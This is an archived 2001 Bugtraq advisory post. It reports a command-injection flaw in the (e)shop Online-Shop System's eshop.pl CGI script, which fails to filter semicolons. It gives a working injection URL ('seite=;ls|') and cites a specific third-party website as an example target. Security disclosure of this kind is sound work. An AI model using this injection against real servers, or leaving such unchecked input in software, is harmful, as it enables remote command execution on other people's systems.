[22657] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

advisory

daemon@ATHENA.MIT.EDU (Kernel|X|)
Sun Sep 16 20:23:10 2001

Date: Sat, 15 Sep 2001 17:44:51 -0700 (PDT)
Message-Id: <200109160044.f8G0ipN61735@voyager.myzona.net>
To: bugtraq@securityfocus.com
From: Kernel|X| <secure@punkass.com>


                    ------------[ advisory ]------------

name: (e)shop Online-Shop System

author:
WEBDISCOUNT, Inh. Michael Boehme

Problem:
Script doesnt check for symbol ";". any user 
can execute any *nix commands on webserver.

exploit:
host/cgi-bin/eshop.pl?seite=;ls|

ex.
http://www.azl-mobilfunk.com/cgi-bin/eshop.pl?seite=;ls|

Bug found by Kernel|X| 
 [ twisted metal ]

E-Mail: [secure@punkass.com] 
        [kernelx@tmgroup.sh]
WWW:     [ www.tmgroup.sh ]

------------
Thank you for using Anonymous mail system! message sent from www.tmgroup.sh


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[22657] in bugtraq

advisory

daemon@ATHENA.MIT.EDU (Kernel|X|)Sun Sep 16 20:23:10 2001

daemon@ATHENA.MIT.EDU (Kernel|X|)
Sun Sep 16 20:23:10 2001